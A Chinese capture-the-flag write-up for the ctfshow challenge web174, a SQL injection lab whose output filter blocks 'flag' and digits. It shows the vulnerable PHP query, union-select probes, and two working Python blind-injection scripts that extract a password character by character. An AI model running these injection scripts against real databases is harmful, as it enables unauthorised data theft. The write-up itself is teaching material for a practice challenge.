web174（无过滤注入4-/flag|[0-9]/i过滤+）

查询语句

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

1' order by 2 --+

 

但是如果有数字或者flag他就不给回显（返回逻辑）

-1' union select password,2 from ctfshow_user4 --+

 我们可以采用盲注的方式来测试，这里我用的substr语句和页面回显查询出的admin语句来结合利用，写一个脚本

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/3/16 16:24
# blog: www.wlhhlc.top
import requests
url = "http://9ee16fc0-d13a-48ce-a43d-08dbe999e319.challenge.ctf.show:8080/api/v4.php"
dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = ""
for i in range(1,50):
    for j in dict:
        payload = f"?id=1' and substr((select password from ctfshow_user4 where username=\"flag\"),{i},1)=\"{j}\"--+"
        gloal = url + payload
        res = requests.get(url=gloal)
        if 'admin' in res.text:
            flag += j
            print(flag)
            break

import requests

url = 'http://f9fd0549-389a-4ee0-b26a-8f574791f409.challenge.ctf.show/api/v4.php'
flag = ''

for i in range(60):
    lenth = len(flag)
    min, max = 32, 128
    while True:
        j = min + (max - min) // 2
        if min == j:
            flag += chr(j)
            print(flag)
            break
        payload = f"?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),{i},1))<{j},'True','False') --+"
        r = requests.get(url=url + payload).text
        if 'True' in r:
            max = j
        else:
            min = j